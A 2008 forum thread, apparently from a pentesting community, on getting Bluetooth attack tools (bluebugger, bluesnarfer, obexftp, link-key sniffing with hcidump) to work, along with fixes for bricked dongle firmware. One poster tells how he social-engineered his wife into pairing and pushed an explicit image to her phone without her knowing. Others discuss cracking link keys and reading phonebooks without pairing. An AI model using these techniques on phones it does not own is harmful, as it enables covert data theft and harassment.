Version: 0x0105

Service Name: Headset Audio Gateway
Service RecHandle: 0x10021
Service Class ID List:
"Headset Audio Gateway" (0x1112)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 4
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Headset" (0x1108)
Version: 0x0100


I can see DUN2, SIM8, FTP11, OPUSH9

Lets change my hcid.conf.


nano /etc/bluetooth/hcid.conf

Changed necessary to match the guide on page 1.

Now to restart bluetooth services


bt ~ # bash /etc/rc.d/rc.bluetooth restart
Stopping Bluetooth subsystem: pand dund rfcomm hidd sdpd hcid.
Starting Bluetooth subsystem: hcid passkeys.


Now I do mknod and sdptool commands but for my channels.


bt ~ # mknod -m 666 /dev/rfcomm0 c 216 2
bt ~ # mknod -m 666 /dev/rfcomm1 c 216 9
bt ~ # mknod -m 666 /dev/rfcomm2 c 216 11
bt ~ # sdptool add --channel=2 DUN
bt ~ # sdptool add --channel=9 OPUSH
bt ~ # sdptool add --channel=11 FTP


So now I should be all set up right?


bluebugger -c 2 -a MAC info


bluebugger 0.1 ( MaJoMu | www.codito.de )
-----------------------------------------

Target Device: '00:18:42:EA:56:11'
Target Name: 'Dave'

Cannot open '/dev/rfcomm0': Connection refused


Before the "Cannot open" error I get prompted for a passkey which seems to work.

Channel 2 and 11 both do this.

If I use 9, I get "Do you want to receive message from ...". Hitting yes makes bluiebugger just hang there till I CTRL-C.

I did
bash /etc/rc.d/rc.bluetooth start just to be sure. It started hcid and passkeys.

For info if you need it:


bt ~ # hciconfig hci* revision
hci0: Type: USB
BD Address: 08:00:46:CC:9C:A1 ACL MTU: 192:8 SCO MTU: 64:8
HCI 16.7.5
Chip version: BlueCore02-External
Max key size: 56 bit
SCO mapping: PCM



bt ~ # hcitool cc 00:18:42:EA:56:11
bt ~ # hcitool auth 00:18:42:EA:56:11
Not connected


bt ~ # bccmd psget -s 0x0000 0x02bf
USB product identifier: 0x0002 (2)


Ok, I think I included everything. Can you see what is wrong?

I want to get this working so bad, spent 3 days solid on this :(

drgr33n
04-09-2008, 01:08 PM
Ok everything looks good and passkey agent looks like it is running, try searching with your phone and linking via the phone.

Also could you go through the process again and record the process with hcidump. Send it over and I will assist more.

hongman
04-09-2008, 04:57 PM
Thanks a lot Dr, it will probably be tomorrow now but watch this space!

Do I just run hcidump -w dumpfile?

drgr33n
04-09-2008, 05:01 PM
np m8t yes just upload the dumpfile.

Also I may be a day answering because I had a hdd meltdown last nite and I'm now running from the bt3 live cd until I rebuild later :mad:

hongman
04-09-2008, 05:08 PM
Thanks, sorry to hear about your HDD :(

I really wanna try bluesmash but I'm running Live CD :P maybe they could include it in next BT3 release :)

I'm not linux savvy enough to incorporate it into my Live CD myself yet :P

One thing, once this is all working I should be able to pull info from my phone without pairing right?

hongman
04-09-2008, 05:55 PM
http://rapidshare.de/files/39069491/dump.html

That is the dump file. I used the command above with hcidump and this is the order I did things:

hcitool scan hci0
sdptool browse MAC
edited hcid.conf as above
mknod + sdptool add
hcitool browse hci0 (decided to try a colleagues Nokia N92)
bluebugger info

Thanks in advance. The log file is not parsed by the way.

drgr33n
04-13-2008, 01:29 PM
Sorry about the late reply.

I cannot download the dump file, I keep getting invalid session? It might be a error at rapidshare so I'l try later in the evening.

hongman
04-14-2008, 10:32 AM
Hmm its coming up invalid for me too.

I'll try re-do it later.

thewheelieking
04-15-2008, 10:54 AM
Hello everyone,

This is my first post and would like to say that Dr GrEen is very informative in many aspects of pen testing. I would also like to thank you Dr GrEen, for the various information you have posted on this site, which has kept me lurking and learning for 5 months. I finally found something I can contribute, so here goes.

I was having the same authentication issue, as Hongman, where I would try to connect with any program from Back Track 3 Beta which prompted the phone for a passkey and found that typing in the passkey on the phone (seems everyone is using "1234") would end in a "connection refused". After Googling "hcid.conf outgoing passkey", because I took the time to read the hcid.conf completely the billionth time around and found it said incoming passkey, I came across entering the passkey I wanted into the following file:


kwrite /etc/bluetooth/passkeys/default <-- type in just the passkey no quotes & save.

I was able to verify the pin when typing it into my MetroPCS Motorola V3M. I have only had success connecting to a phone, so far, using obexftp and the following commands:


First get the directory tree.
obexftp -b BD_ADDR -c / -l


To download files
obexftp -b BD_ADDR -c /Picture -g example.jpg


to upload Files
obexftp -b BD_ADDR -c /Picture -p example.jpg


Got the above info here hxxp://xxx.go2linux.org/transfer-files-with-bluetooth-Linux.

Also to have your phone "discoverable" you need to add to the hcid.conf the following:


# Inquiry and Page scan
iscan enable; pscan enable;
discovto 0;

I was not able to try the discovery mode, as my phone only connects to bluetooth headsets and I have a Targus ACB10US USB dongle with Broadcom chipset. BCCMD reports "unsupported device":mad: , but I will be purchasing something better shortly.

One last thing, I noticed I would never see PSCAN ISCAN in the "hciconfig -a" output until I entered this command:


hciconfig hci0 piscan


One last last thing, I made the following script file called "bluetoothsetup" saved to /mnt/sda1, as I use BT3usb:


hciconfig hci0 up
hciconfig hci0 down
hciconfig hci0 reset
cp -f /mnt/sda1/backups/targusinfo/hcid.conf /etc/bluetooth/hcid.conf
cp -f /mnt/sda1/backups/targusinfo/default /etc/bluetooth/passkey/default <-- can't get this to work yet
mknod -m 666 /dev/rfcomm0 c 216 8
mknod -m 666 /dev/rfcomm1 c 216 17
mknod -m 666 /dev/rfcomm2 c 216 16
sdptool add --channel=8 DUN
sdptool add --channel=16 FTP
sdptool add --channel=17 OPUSH
bash /etc/rc.d/rc.bluetooth restart
hciconfig hci0 piscan
hciconfig -a

I just open up a console and type "/mnt/sda1/backups/targusinfo/bluetoothsetup". No more retyping all that in everytime I reboot!



P.S. I named my device "HitYesThenType1234" and then used bluebugger to initiate a connection to the wifes phone, without her knowing I was doing it. Guess what? She followed the directions and I was authenticated with her phone, where I pushed up a picture of some naked guy (using obexftp commands above). I then went to her and asked to take a picture of our daughter, which I did, then proceeded to question her about the naked picture. After some heckling, I told her what I did and got a "how clever, your way better looking, but if it was Antonio Banderas...." :o That Social Engineering is a mofo, ain't it...

hongman
04-15-2008, 05:33 PM
lol, very nicely done.

I am very busy at the moment with Work but as soon as I get a spare few I will try re-upload that file and also try the above.

Thanks for your contributions, great first post!

sanshinron
04-15-2008, 10:13 PM
after readin this topic carefully i managed to get this working. i had to download newest bluez-libs, bluez-utils, bluez-firmware and bluez-hcitool (install in that order: firmware, libs, utils, hcitool) and then dr green's tutorial worked perfectly. but then i had to solve the connection refused issue (tried to write it to /etc/bluetooth/passkeys/default - bullseye ;d)

i made the same script as thewheelieking, except those two cp-f lines cause a ihave backtrack on hdd and put it in /root/.kde/autostart

rebooted and everything works just fine, but i still have to pair phones using 1234 pin.
when i get connection refused i just randomly try other channels until it works.

when i will have some time i'll post more specific output, what phones i tested and on which channels they connected.

Since its no real use cause of the need to enter pin i am interested in some info on btcrack, i've looked on the google but no tutorials or manual whatsoever. Can you shed some light on this topic, pls?

i had pdf with at commands somewhere, i'll post it as soon as i find it ;d

drgr33n
05-30-2008, 09:32 AM
Just a quick add :D instead of sifting through your saved sniffed packets for the ramdom numbers ETC I've only just found out you can use hcidump to read sorbo's dump file properly to extract the relevant data.

Here's a dump of a link key exchange between my phone and my laptop.



drgr33n ~ # hcidump -V -r out
HCI sniffer - Bluetooth packet analyzer ver 1.41
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> ACL data: handle 0 flags 0x02 dlen 10
L2CAP(s): Info req: type 2
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> ACL data: handle 0 flags 0x02 dlen 12
L2CAP(s): Info rsp: type 2 result 1
Not supported
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20

> HCI Event: Vendor (0xff) plen 20
> HCI Event: Vendor (0xff) plen 20



As you can see hcidump partially understands this, but doesn't know the op codes so just displays HCI event.

You have to tell hcidump what manufacturer of device you are using. CSR's manuf code is 10 so we add this to hcidump and ...



HCI sniffer - Bluetooth packet analyzer ver 1.41
> HCI Event: Vendor (0xff) plen 20
LMP(r): version_res(m): op code 38
VersNr 3 (2.0)
CompId 10 (Cambridge Silicon Radio)
SubVersNr 3164
> HCI Event: Vendor (0xff) plen 20
LMP(s): host_connection_req(m): op code 51
> HCI Event: Vendor (0xff) plen 20
LMP(r): accepted(m): op code 3
op code 51 (host_connection_req)
> HCI Event: Vendor (0xff) plen 20
LMP(r): setup_complete(s): op code 49
> HCI Event: Vendor (0xff) plen 20
LMP(s): packet_type_table_req(m): op code 127/11
packet type table 1 (2/3Mbps)
> HCI Event: Vendor (0xff) plen 20
LMP(s): set_AFH(m): op code 60
AFH_instant 0x5072c
AFH_mode 1
AFH_channel_map 0xffffffffffffffffff7f
> HCI Event: Vendor (0xff) plen 20
LMP(r): accepted_ext(m): op code 127/1
op code 127/11 (packet_type_table_req)
> HCI Event: Vendor (0xff) plen 20
LMP(s): channel_classification_req(m): op code 127/16
AFH reporting mode 1
AFH min interval 0x0640
AFH max interval 0xbb80
> HCI Event: Vendor (0xff) plen 20
LMP(s): in_rand(m): op code 8
random number c93ebf1f5c9a7362a80a72414dfabeb1
> HCI Event: Vendor (0xff) plen 20
LMP(r): accepted(m): op code 3
op code 8 (in_rand)
> HCI Event: Vendor (0xff) plen 20
LMP(s): comb_key(m): op code 9
random number 0f34da046545e5a15a11639d71a067b6
> HCI Event: Vendor (0xff) plen 20
LMP(r): comb_key(m): op code 9
random number 8e429e343d0c330f1c00071806389c87
> HCI Event: Vendor (0xff) plen 20
LMP(s): au_rand(m): op code 11
random number 54fba1db6e2d0aabda8a06b9ff0a2ae8
> HCI Event: Vendor (0xff) plen 20
LMP(r): sres(m): op code 12
authentication response 1c890d81
> HCI Event: Vendor (0xff) plen 20
LMP(r): au_rand(m): op code 11
random number 760affcf59bec9e178556145a01ab630
> HCI Event: Vendor (0xff) plen 20

LMP(s): sres(m): op code 12
IN_RAND c93ebf1f5c9a7362a80a72414dfabeb1
COMB_KEY 0f34da046545e5a15a11639d71a067b6 (M)
COMB_KEY 8e429e343d0c330f1c00071806389c87 (S)
AU_RAND 54fba1db6e2d0aabda8a06b9ff0a2ae8 SRES 1c890d81 (M)
AU_RAND 760affcf59bec9e178556145a01ab630 SRES b2b6be7f (S)
authentication response b2b6be7f

> HCI Event: Vendor (0xff) plen 20
LMP(s): setup_complete(m): op code 49
> HCI Event: Vendor (0xff) plen 20
LMP(s): max_slot(m): op code 45
max slots 5
> HCI Event: Vendor (0xff) plen 20
LMP(s): max_slot_req(m): op code 46
max slots 5
> HCI Event: Vendor (0xff) plen 20
LMP(s): auto_rate(m): op code 35
> HCI Event: Vendor (0xff) plen 20
LMP(r): auto_rate(s): op code 35
> HCI Event: Vendor (0xff) plen 20
LMP(r): max_slot(s): op code 45
max slots 5
> HCI Event: Vendor (0xff) plen 20
LMP(r): timing_accuracy_req(s): op code 47
> HCI Event: Vendor (0xff) plen 20
LMP(r): accepted(m): op code 3
op code 46 (max_slot_req)
> HCI Event: Vendor (0xff) plen 20
LMP(s): timing_accuracy_res(s): op code 48
drift 250
jitter 10
> ACL data: handle 0 flags 0x02 dlen 10
L2CAP(s): Info req: type 2
> HCI Event: Vendor (0xff) plen 20
LMP(s): timing_accuracy_req(m): op code 47
> HCI Event: Vendor (0xff) plen 20
LMP(r): timing_accuracy_res(m): op code 48
drift 250
jitter 10
> HCI Event: Vendor (0xff) plen 20
LMP(r): feature_req(s): op code 39
features 0xff 0xff 0x8f 0xfe 0x9b 0xf9 0x00 0x80
> HCI Event: Vendor (0xff) plen 20
LMP(s): clkoffset_req(m): op code 5
> HCI Event: Vendor (0xff) plen 20
LMP(s): feature_res(s): op code 40
features 0xff 0xff 0x8d 0xfe 0x9b 0xf9 0x00 0x80
> ACL data: handle 0 flags 0x02 dlen 12
L2CAP(s): Info rsp: type 2 result 1
Not supported
> HCI Event: Vendor (0xff) plen 20
LMP(r): clkoffset_res(m): op code 6
clock offset 0x34d4
> HCI Event: Vendor (0xff) plen 20
LMP(r): name_req(s): op code 1
name offset 0
> HCI Event: Vendor (0xff) plen 20
LMP(s): supervision_timeout(m): op code 55
supervision timeout 9600
> HCI Event: Vendor (0xff) plen 20
LMP(s): name_res(s): op code 2
name offset 0
name length 8
name fragment 'LG KG290'
> HCI Event: Vendor (0xff) plen 20
LMP(s): name_req(m): op code 1
name offset 0
> HCI Event: Vendor (0xff) plen 20
LMP(r): name_res(m): op code 2
name offset 0
name length 11
name fragment 'drgr33n (0)'
> HCI Event: Vendor (0xff) plen 20
LMP(s): preferred_rate(m): op code 36
data rate 0x70
Basic: use FEC, no packet-size preference
EDR: use 3 Mbps packets, use 5-slot packets
> HCI Event: Vendor (0xff) plen 20
LMP(s): decr_power_req(m): op code 32
future use 0x00


I've removed alot of the l2cap packets, but now hcidump understands the op codes and displays all the info needed to crack the link key ;) Alot easier to spot :D

Hope this helps a few people out as it save me a good half hour :D I will add something to bluesmash later but I've been so busy lately I've barely got time for a coffee !!!!

DeadWolf
06-12-2008, 07:15 PM
Dr_GrEeN, Is there a major difference between CSR firmware versions 46 and 49 used in your video? And what's the difference between say versions airsnifferdev46bc2.dfu and airsnifferdev46bc3.dfu, and airsnifferdev46bc4.dfu?

Does the bc2, bc3, and bc4 correspond with the Bluecore#? (i.e. BC4 = Bluecore4)

imported_=Tron=
06-13-2008, 06:23 AM
Does the bc2, bc3, and bc4 correspond with the Bluecore#? (i.e. BC4 = Bluecore4)

Yes I believe so, as I tried it with a BC2 bluetooth dongle, and had to choose the airsnifferdev46bc2.dfu for it to fit.

aggtrfrad
06-16-2008, 03:58 PM
hola
heres my story (please read :P)
-got my a7eng usb dongle today
-changed product id to 0002, restart, works perfectly in raw mode
-my stupidity gets in the game
-i wanted to upgrade the firmware, so i can use it on windows-frontline, so i said lets us frontline's tool to upgrade firmware. started the tool, selected device, selected firmware (airsnifferdev47bc2.dfu), device changes automatically to dfu mode (dev id: ffff), im asked to install new drivers, starting upgrade, at the end of the upload i get an error: verification failed, maybe firmware doesnt match device
-device stays in dfu mode, devid:ffff
-i pluged in back to linux, hciconfig cannot see it, bccmd cannot see it as hci (also tried usb serial connection but no luck), dfutool can succesfully see it but:
-it cannot start downloading firmware FROM the dongle TO my pc
-it can start uploading firmware FROM my pc TO the dongle, but at the end it just says "Waiting for Device" and quits
-device still at the same state
-i also tried to restore to the old firmware with frontline's tool, starts uploading but at the end says device not responding
-conclusion: I'm sorry if i wasnt clear but its a very screwed up case.
edit:
-hciconfig revision showed csr bc2 external
-i saved the original firmware before flashing

imported_=Tron=
06-16-2008, 04:07 PM
You should be able to restore your old firmware on the dongle in linux using dfutool and your backup.

aggtrfrad
06-16-2008, 04:19 PM
thank you, i tried and it starts uploading, at the end i get no errors at all.
but nothing changes, even if i replug the dongle...
dev id still "ffff" instead of "0001", and no hci tools can see it as an hci device.
im trying to connect to it via bccmd, but since it is not an hci device, im trying to connect directly by a serial connection but no luck.
dmesg shows that when i plug the device, it doesnt point to any file at all.
i will post the exact output of dmesg when i reboot to linux

aggtrfrad
06-18-2008, 10:08 AM
You should be able to restore your old firmware on the dongle in linux using dfutool and your backup.

I figured out that my back up at the end of the file it has ASCI code.
I think thats why my dongle will not accept it, dfu ****ed up somehow.
heres how by backed up original firmware looks like @ 98-100%


000A6340 2D00 2D00 2D00 2D00 2D00 2D00 2D00 0D00 -.-.-.-.-.-.-...
000A6350 0D00 0000 5400 6800 6500 2000 6600 6F00 ....T.h.e. .f.o.
000A6360 6C00 6C00 6F00 7700 6900 6E00 6700 2000 l.l.o.w.i.n.g. .
000A6370 6300 6F00 6D00 6D00 6100 6E00 6400 7300 c.o.m.m.a.n.d.s.
000A6380 2000 6100 7200 6500 2000 7500 6E00 6400 .a.r.e. .u.n.d.
000A6390 6F00 6300 7500 6D00 6500 6E00 7400 6500 o.c.u.m.e.n.t.e.
000A63A0 6400 2000 6100 6E00 6400 2000 6D00 6100 d. .a.n.d. .m.a.
000A63B0 7900 2000 6200 6500 2000 6300 6800 6100 y. .b.e. .c.h.a.
000A63C0 6E00 6700 6500 6400 2000 6F00 7200 2000 n.g.e.d. .o.r. .
000A63D0 7200 6500 6D00 6F00 7600 6500 6400 0D00 r.e.m.o.v.e.d...
000A63E0 0000 6900 6E00 2000 6600 7500 7400 7500 ..i.n. .f.u.t.u.
000A63F0 7200 6500 2000 6600 6900 7200 6D00 7700 r.e. .f.i.r.m.w.
000A6400 6100 7200 6500 2000 7200 6500 7600 6900 a.r.e. .r.e.v.i.
000A6410 7300 6900 6F00 6E00 7300 2E00 0D00 0D00 s.i.o.n.s.......
000A6420 0000 4700 4500 5400 2000 5400 5200 5500 ..G.E.T. .T.R.U.
000A6430 5300 5400 4500 4400 4C00 4900 5300 5400 S.T.E.D.L.I.S.T.
000A6440 3C00 4300 5200 3E00 0D00 0000 5200 6500 <.C.R.>.....R.e.
000A6450 7400 7200 6900 6500 7600 6500 7300 2000 t.r.i.e.v.e.s. .
000A6460 7400 6800 6500 2000 6300 7500 7200 7200 t.h.e. .c.u.r.r.
000A6470 6500 6E00 7400 2000 7400 7200 7500 7300 e.n.t. .t.r.u.s.
000A6480 7400 6500 6400 6C00 6900 7300 7400 2000 t.e.d.l.i.s.t. .
000A6490 7300 6500 7400 7400 6900 6E00 6700 2E00 s.e.t.t.i.n.g...
000A64A0 2000 5400 6800 6900 7300 2000 7600 6100 .T.h.i.s. .v.a.
000A64B0 6C00 7500 6500 2000 7700 6900 6C00 6C00 l.u.e. .w.i.l.l.
000A64C0 2000 6200 6500 2000 4F00 4E00 2000 6900 .b.e. .O.N. .i.
000A64D0 6600 2000 7400 6800 6500 2000 7400 7200 f. .t.h.e. .t.r.
000A64E0 7500 7300 7400 6500 6400 0D00 0000 6C00 u.s.t.e.d.....l.
000A64F0 6900 7300 7400 2000 6900 7300 2000 6300 i.s.t. .i.s. .c.
000A6500 7500 7200 7200 6500 6E00 7400 6C00 7900 u.r.r.e.n.t.l.y.
000A6510 2000 6500 6E00 6100 6200 6C00 6500 6400 .e.n.a.b.l.e.d.
000A6520 2000 6100 6E00 6400 2000 4F00 4600 4600 .a.n.d. .O.F.F.
000A6530 2000 6900 6600 2000 6900 7400 2000 6900 .i.f. .i.t. .i.
000A6540 7300 2000 6400 6900 7300 6100 6200 6C00 s. .d.i.s.a.b.l.
000A6550 6500 6400 2E00 2000 5700 6800 6500 6E00 e.d... .W.h.e.n.
000A6560 2000 7400 6800 6900 7300 2000 7300 6500 .t.h.i.s. .s.e.
000A6570 7400 7400 6900 6E00 6700 2000 6900 7300 t.t.i.n.g. .i.s.
000A6580 2000 7400 7500 7200 6E00 6500 6400 0D00 .t.u.r.n.e.d...
000A6590 0000 6F00 6600 6600 2C00 2000 6900 6E00 ..o.f.f.,. .i.n.
000A65A0 6600 6F00 7200 6D00 6100 7400 6900 6F00 f.o.r.m.a.t.i.o.
000A65B0 6E00 2000 6600 6F00 7200 2000 6E00 6500 n. .f.o.r. .n.e.
000A65C0 7700 6C00 7900 2000 7400 7200 7500 7300 w.l.y. .t.r.u.s.
000A65D0 7400 6500 6400 2000 6400 6500 7600 6900 t.e.d. .d.e.v.i.
000A65E0 6300 6500 7300 2000 6900 7300 2000 6E00 c.e.s. .i.s. .n.
000A65F0 6F00 7400 2000 7000 6500 7200 7300 6900 o.t. .p.e.r.s.i.
000A6600 7300 7400 6500 6400 2E00 0D00 0D00 0000 s.t.e.d.........
000A6610 5300 4500 5400 2000 4D00 4F00 4400 4500 S.E.T. .M.O.D.E.
000A6620 2000 4200 4300 5300 5000 3C00 4300 5200 .B.C.S.P.<.C.R.
000A6630 3E00 0D00 0000 5300 7700 6900 7400 6300 >.....S.w.i.t.c.
000A6640 6800 2000 7400 6800 6500 2000 6D00 6F00 h. .t.h.e. .m.o.
000A6650 6400 7500 6C00 6500 2000 6900 6E00 7400 d.u.l.e. .i.n.t.
000A6660 6F00 2000 4800 4300 4900 2000 6D00 6F00 o. .H.C.I. .m.o.
000A6670 6400 6500 2000 6F00 7600 6500 7200 2000 d.e. .o.v.e.r. .
000A6680 7400 6800 6500 2000 4200 4300 5300 5000 t.h.e. .B.C.S.P.
000A6690 2000 5000 7200 6F00 7400 6F00 6300 6F00 .P.r.o.t.o.c.o.
000A66A0 6C00 2E00 0D00 0D00 0000 5300 4500 5400 l.........S.E.T.
000A66B0 2000 4D00 4F00 4400 4500 2000 4400 4900 .M.O.D.E. .D.I.
000A66C0 4100 4700 4E00 4F00 5300 5400 4900 4300 A.G.N.O.S.T.I.C.
000A66D0 3C00 4300 5200 3E00 0D00 0000 5300 7700 <.C.R.>.....S.w.
000A66E0 6900 7400 6300 6800 2000 7400 6800 6500 i.t.c.h. .t.h.e.
000A66F0 2000 6D00 6F00 6400 7500 6C00 6500 2000 .m.o.d.u.l.e. .
000A6700 6900 6E00 7400 6F00 2000 6400 6900 6100 i.n.t.o. .d.i.a.
000A6710 6700 6E00 6F00 7300 7400 6900 6300 7300 g.n.o.s.t.i.c.s.
000A6720 2000 6D00 6F00 6400 6500 2E00 2000 5400 .m.o.d.e... .T.
000A6730 6800 6900 7300 2000 7700 6900 6C00 6C00 h.i.s. .w.i.l.l.
000A6740 2000 6300 6100 7500 7300 6500 2000 6100 .c.a.u.s.e. .a.
000A6750 2000 6C00 6100 7200 6700 6500 2000 6E00 .l.a.r.g.e. .n.
000A6760 7500 6D00 6200 6500 7200 2000 6F00 6600 u.m.b.e.r. .o.f.
000A6770 0D00 0000 7400 7200 6100 6300 6500 2000 ....t.r.a.c.e. .
000A6780 6D00 6500 7300 7300 6100 6700 6500 7300 m.e.s.s.a.g.e.s.
000A6790 2000 7400 6F00 2000 6200 6500 2000 6F00 .t.o. .b.e. .o.
000A67A0 7500 7400 7000 7500 7400 2000 6100 6C00 u.t.p.u.t. .a.l.
000A67B0 6F00 6E00 6700 2000 7700 6900 7400 6800 o.n.g. .w.i.t.h.
000A67C0 2000 6E00 6F00 7200 6D00 6100 6C00 2000 .n.o.r.m.a.l. .
000A67D0 6300 6F00 6D00 6D00 6100 6E00 6400 2000 c.o.m.m.a.n.d. .
000A67E0 6D00 6F00 6400 6500 2000 6400 6100 7400 m.o.d.e. .d.a.t.
000A67F0 6100 2E00 0D00 0D00 0000 5300 4500 5400 a.........S.E.T.
000A6800 2000 5300 5400 4100 5400 5500 5300 2000 .S.T.A.T.U.S. .
000A6810 6900 6E00 7600 6500 7200 7400 6500 6400 i.n.v.e.r.t.e.d.
000A6820 2000 7C00 2000 6E00 6F00 7200 6D00 6100 .|. .n.o.r.m.a.
000A6830 6C00 3C00 4300 5200 3E00 0D00 0000 5700 l.<.C.R.>.....W.
000A6840 6800 6500 6E00 2000 7300 6500 7400 2000 h.e.n. .s.e.t. .
000A6850 7400 6F00 2000 6E00 6F00 7200 6D00 6100 t.o. .n.o.r.m.a.
000A6860 6C00 2000 7400 6800 6500 2000 5300 5400 l. .t.h.e. .S.T.
000A6870 4100 5400 5500 5300 2000 6C00 6900 6E00 A.T.U.S. .l.i.n.
000A6880 6500 2000 7700 6900 6C00 6C00 2000 6200 e. .w.i.l.l. .b.
000A6890 6500 2000 6100 6300 7400 6900 7600 6500 e. .a.c.t.i.v.e.
000A68A0 2000 6C00 6F00 7700 2E00 2000 5700 6800 .l.o.w... .W.h.
000A68B0 6500 6E00 2000 7300 6500 7400 2000 7400 e.n. .s.e.t. .t.
000A68C0 6F00 2000 6900 6E00 7600 6500 7200 7400 o. .i.n.v.e.r.t.
000A68D0 6500 6400 0D00 0000 7400 6800 6500 2000 e.d.....t.h.e. .
000A68E0 5300 5400 4100 5400 5500 5300 2000 6C00 S.T.A.T.U.S. .l.
000A68F0 6900 6E00 6500 2000 7700 6900 6C00 6C00 i.n.e. .w.i.l.l.
000A6900 2000 6200 6500 2000 6100 6300 7400 6900 .b.e. .a.c.t.i.
000A6910 7600 6500 2000 6800 6900 6700 6800 2E00 v.e. .h.i.g.h...
000A6920 0D00 0D00 0000 3E00 0000 4100 4300 4B00 ......>...A.C.K.
000A6930 0000 6600 6100 6300 7400 6F00 7200 7900 ..f.a.c.t.o.r.y.
000A6940 0000 6F00 6E00 0000 6F00 6600 6600 0000 ..o.n...o.f.f...
000A6950 5300 6100 7600 6900 6E00 6700 2000 6E00 S.a.v.i.n.g. .n.
000A6960 6500 7700 2000 7300 6500 7400 7400 6900 e.w. .s.e.t.t.i.
000A6970 6E00 6700 7300 2000 7400 6F00 2000 6600 n.g.s. .t.o. .f.
000A6980 6C00 6100 7300 6800 0D00 0000 6200 6300 l.a.s.h.....b.c.
000A6990 7300 7000 0000 6400 6900 6100 6700 6E00 s.p...d.i.a.g.n.
000A69A0 6F00 7300 7400 6900 6300 0000 6900 6E00 o.s.t.i.c...i.n.
000A69B0 7600 6500 7200 7400 6500 6400 0000 6E00 v.e.r.t.e.d...n.
000A69C0 6F00 7200 6D00 6100 6C00 0000 4E00 4100 o.r.m.a.l...N.A.
000A69D0 4B00 0D00 0000 3E00 0000 3100 3200 3000 K.....>...1.2.0.
000A69E0 3000 0000 4100 4300 4B00 0D00 0000 3200 0...A.C.K.....2

sws2007
06-20-2008, 05:11 PM
Hi aggtrfrad,

I have the EXACTLY same problem, just that I bricked until now 3 * a7eng 502 dongles. It seems that this dongle is not so compatible with this method of changing firmware.

I tried with frontline and it doesn't get out of DFU mode (ffff)
I tried with dfutool and it doesn't get out of DFU mode (ffff)
Trying to restore the backup firmware is successfull, but the device never gets back to 0001, it just stays with ffff

I would like to know if everyone got this dongle ever to work in sniffing mode.

Also, this dongle has different places to write to, and I only figured out now, when I have no other dongles to play with. It has 0x0000, 0x0001, 0x0003, 0x0004 .. 5, 6, and 0x0007. The values on 0x0004 are not changeable, it seems they are rom, however, i figured out that I can change it to 0x0002 on 0x0007, 0x0000, 0x0001, 0x0002

Hopefully my next attempt will be successful or some mate will post some solution here.

Thank you all

akamagic
06-24-2008, 07:32 AM
first off this entire thread has helped alot however after about 4 hours of trail and error im officially stuck...but sadly im afraid i already know the answer, which is to get a dongle that is ext......but as read in previous posts its not a simple task and easy to brick...so i was just wondering since i only have a rom based dongle if i could get better results. So far im at the point where i can finally connect to my phone (razr v9m but hopeing im just having troubles because it is an up to date phone) after entering my pin (0000) however sometimes i dont even need to but instead just "accept" (and rarely it just connects without any means of accepting on my phone). the problem is even though im connected it doesn't do any of the commands i implement using bluebugger but rather it hangs after it gives me the device and name (while still remaining connected to phone). for example it hangs even though i use channel 18 (OBEX Phonebook Access profile) and by using the line:
bluebugger -c 18 -a 00:1c:c1:80:15:18 phonebook

same results with bluesnarfer:
bluesnarfer -r A-C -b 00:1c:c1:80:15:18

everything looks right since im connected (unless my phone is lying) but i dont get any results

PS:i was finally able to connect by using the tip of passkeys/default/ typing 0000 and also using hciconfig hci0 piscan and finding the channels which seem appropriate for the commands i try. im obviously a noobie so bare with me....BUT IN SHORT is my only option getting a dongle ext based? or should i stick with my rom based one? Thanx in advanced

imported_johnjohnsp1
06-24-2008, 03:30 PM
Great Tutorial DrGr33n, i have a dongle Dlink Bleutooth DBT-122 and i have hard time to make it in a RAW mode like u do .. here some of my output

hciconfig hci0 revision
hci0: Type: USB
BD Address: 00:1C:F0:6C:AC:D4 ACL MTU: 1017:8 SCO MTU: 64:0
Firmware 61.67 / 14

so i dont really understand when thats mean, dont see EXT or ROM chipset i will post here more info about my device

hciconfig -a
hci0: Type: USB
BD Address: 00:1C:F0:6C:AC:D4 ACL MTU: 1017:8 SCO MTU: 64:0
UP RUNNING
RX bytes:398 acl:0 sco:0 events:14 errors:0
TX bytes:48 acl:0 sco:0 commands:14 errors:0
Features: 0xff 0xff 0x8d 0xfe 0x9b 0xf9 0x00 0x80
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy:
Link mode: SLAVE ACCEPT
Name: 'BCM2045B3'
Class: 0x000000
Service Classes: Unspecified
Device Class: Miscellaneous,
HCI Ver: 2.0 (0x3) HCI Rev: 0x403d LMP Ver: 2.0 (0x3) LMP Subver: 0x430e
Manufacturer: Broadcom Corporation (15)

once i try to do the command for backup the firmware i get this
dfutool -d hci0 archive backolddlink.dfu
Available devices with DFU support:

1) Bus 3 Device 4: ID 07d1:f101 Interface 3

Select device (abort with 0): 1

Can't identify device with DFU mode

even when i try to do any of the BCCMD command i still get this message

bccmd psget -s 0x0000 0x02bf
Unsupported manufacturer

